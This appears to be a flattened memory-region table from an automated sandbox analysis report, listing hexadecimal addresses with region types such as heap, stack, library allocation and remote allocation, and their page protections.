page read and write
|
||
|
2E1B7E56000
|
heap
|
page read and write
|
||
|
7FFF7F0F2000
|
trusted library allocation
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
5C17A7C000
|
stack
|
page read and write
|
||
|
FB81D7E000
|
stack
|
page read and write
|
||
|
AE9EFB000
|
stack
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
2E1BD561000
|
trusted library allocation
|
page read and write
|
||
|
20E43A90000
|
trusted library allocation
|
page read and write
|
||
|
2B983F8D000
|
heap
|
page read and write
|
||
|
BA85BFC000
|
stack
|
page read and write
|
||
|
FB81CFF000
|
stack
|
page read and write
|
||
|
2E1B7F02000
|
heap
|
page read and write
|
||
|
166DDD70000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F44A000
|
heap
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
1DAACFE000
|
stack
|
page read and write
|
||
|
166EFBE1000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
2B983F15000
|
heap
|
page read and write
|
||
|
166E0873000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B242000
|
heap
|
page read and write
|
||
|
2CB7F3C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F010000
|
trusted library allocation
|
page execute and read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD6A0000
|
remote allocation
|
page read and write
|
||
|
AE9BF7000
|
stack
|
page read and write
|
||
|
A4AC47F000
|
stack
|
page read and write
|
||
|
25282ED0000
|
heap
|
page read and write
|
||
|
1FF4B278000
|
heap
|
page read and write
|
||
|
209F5A40000
|
heap
|
page read and write
|
||
|
28286FA0000
|
trusted library allocation
|
page read and write
|
||
|
5C17E7F000
|
stack
|
page read and write
|
||
|
2828704E000
|
heap
|
page read and write
|
||
|
2E1BD84C000
|
heap
|
page read and write
|
||
|
2E1B7DD0000
|
trusted library allocation
|
page read and write
|
||
|
7CB000
|
heap
|
page read and write
|
||
|
28287100000
|
heap
|
page read and write
|
||
|
1D4A3C13000
|
heap
|
page read and write
|
||
|
25126660000
|
heap
|
page read and write
|
||
|
F77495B000
|
stack
|
page read and write
|
||
|
25282EE1000
|
heap
|
page read and write
|
||
|
2B983F53000
|
heap
|
page read and write
|
||
|
166DDD12000
|
heap
|
page read and write
|
||
|
58F607B000
|
stack
|
page read and write
|
||
|
2CB7F502000
|
heap
|
page read and write
|
||
|
166F81F0000
|
heap
|
page read and write
|
||
|
166F8110000
|
trusted library allocation
|
page read and write
|
||
|
166F7C89000
|
heap
|
page read and write
|
||
|
209F5A79000
|
heap
|
page read and write
|
||
|
2E1B8902000
|
heap
|
page read and write
|
||
|
1DAAC7E000
|
stack
|
page read and write
|
||
|
166F7CE1000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD660000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F10C000
|
trusted library allocation
|
page read and write
|
||
|
80C000
|
heap
|
page read and write
|
||
|
2CB7F44B000
|
heap
|
page read and write
|
||
|
2E1B8F50000
|
trusted library allocation
|
page read and write
|
||
|
25126662000
|
heap
|
page read and write
|
||
|
2B9834C3000
|
heap
|
page read and write
|
||
|
DBFFA7D000
|
stack
|
page read and write
|
||
|
17433802000
|
trusted library allocation
|
page read and write
|
||
|
166F7C50000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2B983310000
|
heap
|
page read and write
|
||
|
25282ED2000
|
heap
|
page read and write
|
||
|
DBFF7FB000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
1D4A3AB0000
|
heap
|
page read and write
|
||
|
2B983F85000
|
heap
|
page read and write
|
||
|
25282EE1000
|
heap
|
page read and write
|
||
|
166F7CC4000
|
heap
|
page read and write
|
||
|
5C17C7C000
|
stack
|
page read and write
|
||
|
2B983F9E000
|
heap
|
page read and write
|
||
|
1FF4B26B000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
AEA9CD000
|
stack
|
page read and write
|
||
|
166DDC73000
|
heap
|
page read and write
|
||
|
222E000
|
stack
|
page read and write
|
||
|
166DFDF1000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F513000
|
heap
|
page read and write
|
||
|
BA85A7F000
|
stack
|
page read and write
|
||
|
5C1857F000
|
stack
|
page read and write
|
||
|
166E07FA000
|
trusted library allocation
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
1FF4AF90000
|
heap
|
page read and write
|
||
|
20E43244000
|
heap
|
page read and write
|
||
|
166F7D5C000
|
trusted library allocation
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
7FFF7EF50000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B23A000
|
heap
|
page read and write
|
||
|
1FF4B231000
|
heap
|
page read and write
|
||
|
AE9CF9000
|
stack
|
page read and write
|
||
|
FB8217E000
|
stack
|
page read and write
|
||
|
17433002000
|
heap
|
page read and write
|
||
|
AE997D000
|
stack
|
page read and write
|
||
|
2CB7F518000
|
heap
|
page read and write
|
||
|
25282EBB000
|
heap
|
page read and write
|
||
|
166E08AD000
|
trusted library allocation
|
page read and write
|
||
|
17432FF0000
|
remote allocation
|
page read and write
|
||
|
25282C60000
|
heap
|
page read and write
|
||
|
DBFFB7F000
|
stack
|
page read and write
|
||
|
1DAB07E000
|
stack
|
page read and write
|
||
|
7FFF7F280000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F120000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E1B7D40000
|
heap
|
page read and write
|
||
|
2E1BD560000
|
trusted library allocation
|
page read and write
|
||
|
1D4A3B10000
|
heap
|
page read and write
|
||
|
1F8E000
|
stack
|
page read and write
|
||
|
166F7C6B000
|
heap
|
page read and write
|
||
|
1FF4B000000
|
heap
|
page read and write
|
||
|
20E43180000
|
heap
|
page read and write
|
||
|
2E1BD570000
|
trusted library allocation
|
page read and write
|
||
|
29D6000
|
heap
|
page read and write
|
||
|
285E000
|
stack
|
page read and write
|
||
|
1DAB17F000
|
stack
|
page read and write
|
||
|
2B983FA9000
|
heap
|
page read and write
|
||
|
2B98348D000
|
heap
|
page read and write
|
||
|
FB81BFF000
|
stack
|
page read and write
|
||
|
5C17F7E000
|
stack
|
page read and write
|
||
|
166DDDF0000
|
heap
|
page read and write
|
||
|
166E0A49000
|
trusted library allocation
|
page read and write
|
||
|
1D4A4402000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F1D0000
|
trusted library allocation
|
page read and write
|
||
|
1D4A3AA0000
|
heap
|
page read and write
|
||
|
217E4213000
|
heap
|
page read and write
|
||
|
20E43D00000
|
heap
|
page read and write
|
||
|
2E1BD81E000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
1FF4B27B000
|
heap
|
page read and write
|
||
|
2B983FAD000
|
heap
|
page read and write
|
||
|
2B983F74000
|
heap
|
page read and write
|
||
|
2B9834FD000
|
heap
|
page read and write
|
||
|
209F5A80000
|
heap
|
page read and write
|
||
|
17833FB000
|
stack
|
page read and write
|
||
|
2B983CE0000
|
remote allocation
|
page read and write
|
||
|
217E4271000
|
heap
|
page read and write
|
||
|
2A0A000
|
heap
|
page read and write
|
||
|
37AE37F000
|
stack
|
page read and write
|
||
|
2B983F79000
|
heap
|
page read and write
|
||
|
863000
|
heap
|
page read and write
|
||
|
17433013000
|
heap
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
1FF4B100000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
2B983F00000
|
heap
|
page read and write
|
||
|
166DDDA0000
|
heap
|
page readonly
|
||
|
209F58B0000
|
heap
|
page read and write
|
||
|
2E1B7E89000
|
heap
|
page read and write
|
||
|
2E1B7DE0000
|
trusted library section
|
page read and write
|
||
|
2AA7000
|
heap
|
page read and write
|
||
|
2E1B7E29000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F150000
|
trusted library allocation
|
page read and write
|
||
|
2B983F1F000
|
heap
|
page read and write
|
||
|
2B984402000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
5C1827D000
|
stack
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
760000
|
heap
|
page readonly
|
||
|
166E0822000
|
trusted library allocation
|
page read and write
|
||
|
217E4250000
|
heap
|
page read and write
|
||
|
29ED000
|
heap
|
page read and write
|
||
|
20E43200000
|
heap
|
page read and write
|
||
|
2E1BD8FC000
|
heap
|
page read and write
|
||
|
FB81E7B000
|
stack
|
page read and write
|
||
|
1FF4B255000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7C94000
|
heap
|
page read and write
|
||
|
28287102000
|
heap
|
page read and write
|
||
|
166F814E000
|
trusted library allocation
|
page read and write
|
||
|
2B983FA8000
|
heap
|
page read and write
|
||
|
166E0A1E000
|
trusted library allocation
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2E1B7E77000
|
heap
|
page read and write
|
||
|
2512665C000
|
heap
|
page read and write
|
||
|
2CB7F370000
|
trusted library allocation
|
page read and write
|
||
|
166F7D38000
|
trusted library allocation
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
7FFF7EF5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E1BD3A0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
166F7C94000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
1D4A3C24000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2512665E000
|
heap
|
page read and write
|
||
|
2CB7F390000
|
trusted library allocation
|
page read and write
|
||
|
AE9DFE000
|
stack
|
page read and write
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
37ADC7F000
|
stack
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F489000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
209F5B13000
|
heap
|
page read and write
|
||
|
2B983F55000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
23CC000
|
stack
|
page read and write
|
||
|
166E083D000
|
trusted library allocation
|
page read and write
|
||
|
25126689000
|
heap
|
page read and write
|
||
|
166F7E90000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8918000
|
heap
|
page read and write
|
||
|
2E1BD6A0000
|
trusted library allocation
|
page read and write
|
||
|
25126629000
|
heap
|
page read and write
|
||
|
2E1B7E9B000
|
heap
|
page read and write
|
||
|
20E432C7000
|
heap
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
AE987F000
|
stack
|
page read and write
|
||
|
7FFF7F036000
|
trusted library allocation
|
page execute and read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
6E51C7E000
|
stack
|
page read and write
|
||
|
25282EDF000
|
heap
|
page read and write
|
||
|
DB472FE000
|
stack
|
page read and write
|
||
|
20E43313000
|
heap
|
page read and write
|
||
|
7FFF7F1C0000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8800000
|
heap
|
page read and write
|
||
|
A4AC377000
|
stack
|
page read and write
|
||
|
166F7E80000
|
trusted library allocation
|
page read and write
|
||
|
166F8130000
|
trusted library allocation
|
page read and write
|
||
|
DB4757C000
|
stack
|
page read and write
|
||
|
217E4A70000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F2E0000
|
heap
|
page read and write
|
||
|
2E1B7EB8000
|
heap
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8E30000
|
trusted library section
|
page readonly
|
||
|
2E1BD82B000
|
heap
|
page read and write
|
||
|
1DAA99C000
|
stack
|
page read and write
|
||
|
7FFFE220B000
|
unkown
|
page read and write
|
||
|
1FF4B23C000
|
heap
|
page read and write
|
||
|
37ADD7D000
|
stack
|
page read and write
|
||
|
1FF4B27F000
|
heap
|
page read and write
|
||
|
2E1BD862000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2B984402000
|
heap
|
page read and write
|
||
|
2A0A000
|
heap
|
page read and write
|
||
|
7FFF7F170000
|
trusted library allocation
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
remote allocation
|
page read and write
|
||
|
7FFF7F160000
|
trusted library allocation
|
page read and write
|
||
|
166DDCE3000
|
heap
|
page read and write
|
||
|
1FF4B240000
|
heap
|
page read and write
|
||
|
1FF4B229000
|
heap
|
page read and write
|
||
|
2E1BD540000
|
trusted library allocation
|
page read and write
|
||
|
1782ECC000
|
stack
|
page read and write
|
||
|
1FF4B200000
|
heap
|
page read and write
|
||
|
5C180FD000
|
stack
|
page read and write
|
||
|
166DDDB0000
|
trusted library allocation
|
page read and write
|
||
|
166F7E90000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B265000
|
heap
|
page read and write
|
||
|
25282EDF000
|
heap
|
page read and write
|
||
|
166F7D51000
|
trusted library allocation
|
page read and write
|
||
|
7FFFE2202000
|
unkown
|
page readonly
|
||
|
166F7D66000
|
heap
|
page execute and read and write
|
||
|
7FFF7F2E0000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F467000
|
heap
|
page read and write
|
||
|
166F7D39000
|
trusted library allocation
|
page read and write
|
||
|
A4ABDEE000
|
stack
|
page read and write
|
||
|
AE99FE000
|
stack
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F400000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7EF6C000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD540000
|
trusted library allocation
|
page read and write
|
||
|
28287A02000
|
trusted library allocation
|
page read and write
|
||
|
1E9E000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
209F5B00000
|
heap
|
page read and write
|
||
|
1743302A000
|
heap
|
page read and write
|
||
|
2E1B93A0000
|
trusted library allocation
|
page read and write
|
||
|
2512667F000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166E08A5000
|
trusted library allocation
|
page read and write
|
||
|
28287000000
|
heap
|
page read and write
|
||
|
5C1837E000
|
stack
|
page read and write
|
||
|
1D4A3C00000
|
heap
|
page read and write
|
||
|
166F8120000
|
trusted library allocation
|
page read and write
|
||
|
1FF4AFA0000
|
heap
|
page read and write
|
||
|
29EA000
|
heap
|
page read and write
|
||
|
166F7F19000
|
heap
|
page read and write
|
||
|
29C5000
|
heap
|
page read and write
|
||
|
2B983400000
|
heap
|
page read and write
|
||
|
25126700000
|
heap
|
page read and write
|
||
|
2E1B7E00000
|
heap
|
page read and write
|
||
|
7FFF7F180000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
trusted library allocation
|
page read and write
|
||
|
BA85D77000
|
stack
|
page read and write
|
||
|
2CB7FC02000
|
trusted library allocation
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
2A01000
|
heap
|
page read and write
|
||
|
25126627000
|
heap
|
page read and write
|
||
|
166E0A30000
|
trusted library allocation
|
page read and write
|
||
|
29D6000
|
heap
|
page read and write
|
||
|
166F7F03000
|
heap
|
page read and write
|
||
|
166E0A16000
|
trusted library allocation
|
page read and write
|
||
|
166DDC9C000
|
heap
|
page read and write
|
||
|
2B983483000
|
heap
|
page read and write
|
||
|
166F7C3A000
|
heap
|
page read and write
|
||
|
25126613000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
AE9AFE000
|
stack
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
25282E40000
|
heap
|
page read and write
|
||
|
166DF730000
|
heap
|
page read and write
|
||
|
166F7E80000
|
trusted library allocation
|
page read and write
|
||
|
209F5A00000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
F774EFF000
|
stack
|
page read and write
|
||
|
25282E45000
|
heap
|
page read and write
|
||
|
166F7EEA000
|
heap
|
page read and write
|
||
|
1DAAE7E000
|
stack
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
25126500000
|
heap
|
page read and write
|
||
|
217E4313000
|
heap
|
page read and write
|
||
|
6E519FE000
|
stack
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD564000
|
trusted library allocation
|
page read and write
|
||
|
2B9834CA000
|
heap
|
page read and write
|
||
|
166DFBE1000
|
trusted library allocation
|
page read and write
|
||
|
DB474FF000
|
stack
|
page read and write
|
||
|
BA85E78000
|
stack
|
page read and write
|
||
|
166F7D00000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD8FD000
|
heap
|
page read and write
|
||
|
209F5A13000
|
heap
|
page read and write
|
||
|
DBFF37E000
|
stack
|
page read and write
|
||
|
7FFF7F104000
|
trusted library allocation
|
page read and write
|
||
|
58F637E000
|
stack
|
page read and write
|
||
|
2B983CE0000
|
remote allocation
|
page read and write
|
||
|
25282EC6000
|
heap
|
page read and write
|
||
|
166F7D60000
|
heap
|
page execute and read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
166E08A1000
|
trusted library allocation
|
page read and write
|
||
|
AE9D7F000
|
stack
|
page read and write
|
||
|
2E1BD650000
|
trusted library allocation
|
page read and write
|
||
|
2B983F9F000
|
heap
|
page read and write
|
||
|
8B9000
|
heap
|
page read and write
|
||
|
166E0884000
|
trusted library allocation
|
page read and write
|
||
|
166F7E80000
|
trusted library allocation
|
page read and write
|
||
|
166EFC41000
|
trusted library allocation
|
page read and write
|
||
|
166E07F0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD8F4000
|
heap
|
page read and write
|
||
|
217E4308000
|
heap
|
page read and write
|
||
|
1D4A3D02000
|
heap
|
page read and write
|
||
|
7FFF7F1B0000
|
trusted library allocation
|
page read and write
|
||
|
1DD0000
|
direct allocation
|
page execute and read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
17835FB000
|
stack
|
page read and write
|
||
|
166F80F0000
|
trusted library allocation
|
page read and write
|
||
|
2B9834EB000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
29E4000
|
heap
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
2CB7F340000
|
heap
|
page read and write
|
||
|
166F80B0000
|
trusted library allocation
|
page read and write
|
||
|
166F80C0000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD8F9000
|
heap
|
page read and write
|
||
|
1FF4B263000
|
heap
|
page read and write
|
||
|
166DDCA3000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
7FFF7EF60000
|
trusted library allocation
|
page read and write
|
||
|
166DFBD0000
|
heap
|
page execute and read and write
|
||
|
28286F70000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F101000
|
trusted library allocation
|
page read and write
|
||
|
BA8607F000
|
stack
|
page read and write
|
||
|
20E43266000
|
heap
|
page read and write
|
||
|
2E1B8E10000
|
trusted library section
|
page readonly
|
||
|
84B000
|
heap
|
page read and write
|
||
|
2828706E000
|
heap
|
page read and write
|
||
|
166F7D11000
|
trusted library allocation
|
page read and write
|
||
|
2AEE000
|
heap
|
page read and write
|
||
|
166F80E0000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD8AB000
|
heap
|
page read and write
|
||
|
2A5A000
|
heap
|
page read and write
|
||
|
1D4A3D13000
|
heap
|
page read and write
|
||
|
2E1B8900000
|
heap
|
page read and write
|
||
|
37ADF7E000
|
stack
|
page read and write
|
||
|
2512663C000
|
heap
|
page read and write
|
||
|
803000
|
heap
|
page read and write
|
||
|
166F7EA0000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8959000
|
heap
|
page read and write
|
||
|
A4AC27B000
|
stack
|
page read and write
|
||
|
209F5A68000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
2E1BD6A0000
|
remote allocation
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
2E1BD54E000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD8E3000
|
heap
|
page read and write
|
||
|
AEA94E000
|
stack
|
page read and write
|
||
|
AE9B78000
|
stack
|
page read and write
|
||
|
25126602000
|
heap
|
page read and write
|
||
|
25282ED4000
|
heap
|
page read and write
|
||
|
17432EC0000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
BA861FE000
|
unkown
|
page read and write
|
||
|
166DFA83000
|
heap
|
page read and write
|
||
|
166F7D31000
|
trusted library allocation
|
page read and write
|
||
|
2B983413000
|
heap
|
page read and write
|
||
|
37AD6CB000
|
stack
|
page read and write
|
||
|
6E51AFE000
|
stack
|
page read and write
|
||
|
37AE57F000
|
stack
|
page read and write
|
||
|
2E1B8913000
|
heap
|
page read and write
|
||
|
2E1BD855000
|
heap
|
page read and write
|
||
|
2E1B7E90000
|
heap
|
page read and write
|
||
|
2B983494000
|
heap
|
page read and write
|
||
|
2CB7F45B000
|
heap
|
page read and write
|
||
|
2E1BD8FF000
|
heap
|
page read and write
|
||
|
37AE47F000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
25126600000
|
heap
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
2B983FAD000
|
heap
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
166E0A03000
|
trusted library allocation
|
page read and write
|
||
|
2B983F84000
|
heap
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
2A61000
|
heap
|
page read and write
|
||
|
2E1BD8F8000
|
heap
|
page read and write
|
||
|
2E1BD800000
|
heap
|
page read and write
|
||
|
37ADAFA000
|
stack
|
page read and write
|
||
|
20E432CF000
|
heap
|
page read and write
|
||
|
5C1847D000
|
stack
|
page read and write
|
||
|
A4AC07E000
|
stack
|
page read and write
|
||
|
166F7EFC000
|
heap
|
page read and write
|
||
|
2E1BD8A0000
|
heap
|
page read and write
|
||
|
25282EC1000
|
heap
|
page read and write
|
||
|
7FFF7F290000
|
trusted library allocation
|
page read and write
|
||
|
A4ABD6B000
|
stack
|
page read and write
|
||
|
246E000
|
stack
|
page read and write
|
||
|
2E1BD8FF000
|
heap
|
page read and write
|
||
|
28287054000
|
heap
|
page read and write
|
||
|
AE9C7A000
|
stack
|
page read and write
|
||
|
F7751FC000
|
stack
|
page read and write
|
||
|
25126702000
|
heap
|
page read and write
|
||
|
7FFFE21E1000
|
unkown
|
page execute read
|
||
|
166F7F06000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
DB473F8000
|
stack
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
166F7F0D000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
25282EEF000
|
heap
|
page read and write
|
||
|
6E5187B000
|
stack
|
page read and write
|
||
|
166DF724000
|
trusted library allocation
|
page read and write
|
||
|
20E43C02000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
1D4A3C5B000
|
heap
|
page read and write
|
||
|
2E1B8958000
|
heap
|
page read and write
|
||
|
AEAA8F000
|
stack
|
page read and write
|
||
|
29A2000
|
heap
|
page read and write
|
||
|
FB815F7000
|
stack
|
page read and write
|
||
|
2E1B7E75000
|
heap
|
page read and write
|
||
|
2E1B7E87000
|
heap
|
page read and write
|
||
|
7FFF7EF54000
|
trusted library allocation
|
page read and write
|
||
|
2B98348B000
|
heap
|
page read and write
|
||
|
166E0AD8000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F1A0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
DB4727A000
|
stack
|
page read and write
|
||
|
7FFF7F2A0000
|
trusted library allocation
|
page read and write
|
||
|
166E0A27000
|
trusted library allocation
|
page read and write
|
||
|
166DDAA0000
|
heap
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
17432FF0000
|
remote allocation
|
page read and write
|
||
|
265B000
|
stack
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
29DE000
|
heap
|
page read and write
|
||
|
FB8197F000
|
stack
|
page read and write
|
||
|
7FFF7F140000
|
trusted library allocation
|
page execute and read and write
|
||
|
AE959F000
|
stack
|
page read and write
|
||
|
1D4A3C02000
|
heap
|
page read and write
|
||
|
28286F00000
|
heap
|
page read and write
|
||
|
2E1B9371000
|
trusted library allocation
|
page read and write
|
||
|
25282ED7000
|
heap
|
page read and write
|
||
|
166DDC00000
|
heap
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
166F8150000
|
trusted library allocation
|
page read and write
|
||
|
2828706E000
|
heap
|
page read and write
|
||
|
2B983F97000
|
heap
|
page read and write
|
||
|
1D4A3C3D000
|
heap
|
page read and write
|
||
|
7FFF7F070000
|
trusted library allocation
|
page execute and read and write
|
||
|
166E0AE0000
|
trusted library allocation
|
page read and write
|
||
|
2B983F7C000
|
heap
|
page read and write
|
||
|
1F00000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
1D4A43B0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2828703C000
|
heap
|
page read and write
|
||
|
166DDCA7000
|
heap
|
page read and write
|
||
|
166F80B7000
|
trusted library allocation
|
page read and write
|
||
|
166F7C38000
|
heap
|
page read and write
|
||
|
FB81A7B000
|
stack
|
page read and write
|
||
|
2B984400000
|
heap
|
page read and write
|
||
|
29DE000
|
heap
|
page read and write
|
||
|
25282ED6000
|
heap
|
page read and write
|
||
|
2E1B8E40000
|
trusted library section
|
page readonly
|
||
|
17834FF000
|
stack
|
page read and write
|
||
|
166DDBE0000
|
heap
|
page read and write
|
||
|
2512667D000
|
heap
|
page read and write
|
||
|
1FF4BA02000
|
trusted library allocation
|
page read and write
|
||
|
17432FC0000
|
trusted library allocation
|
page read and write
|
||
|
29D6000
|
heap
|
page read and write
|
||
|
166F7EB0000
|
heap
|
page read and write
|
||
|
7FFF7F1F0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
217E41D0000
|
heap
|
page read and write
|
||
|
2B9834EE000
|
heap
|
page read and write
|
||
|
20E4322A000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
166E0A52000
|
trusted library allocation
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD430000
|
trusted library allocation
|
page read and write
|
||
|
2B98349E000
|
heap
|
page read and write
|
||
|
166DF5A0000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B260000
|
heap
|
page read and write
|
||
|
5C1817B000
|
stack
|
page read and write
|
||
|
25282EC6000
|
heap
|
page read and write
|
||
|
217E4229000
|
heap
|
page read and write
|
||
|
7FFF7F220000
|
trusted library allocation
|
page read and write
|
||
|
217E4283000
|
heap
|
page read and write
|
||
|
1FF4B267000
|
heap
|
page read and write
|
||
|
25127002000
|
trusted library allocation
|
page read and write
|
||
|
166E08B6000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD83F000
|
heap
|
page read and write
|
||
|
166DF6F0000
|
heap
|
page execute and read and write
|
||
|
A4AC17C000
|
stack
|
page read and write
|
||
|
217E423C000
|
heap
|
page read and write
|
||
|
DBFF87E000
|
stack
|
page read and write
|
||
|
166F7E80000
|
trusted library allocation
|
page read and write
|
||
|
FB81F7E000
|
stack
|
page read and write
|
||
|
166F7D20000
|
heap
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
25282EE1000
|
heap
|
page read and write
|
||
|
7FFFE220B000
|
unkown
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
2CB7FAE0000
|
remote allocation
|
page read and write
|
||
|
7FFF7F00C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25126510000
|
heap
|
page read and write
|
||
|
7FFF7F000000
|
trusted library allocation
|
page read and write
|
||
|
AE98FF000
|
stack
|
page read and write
|
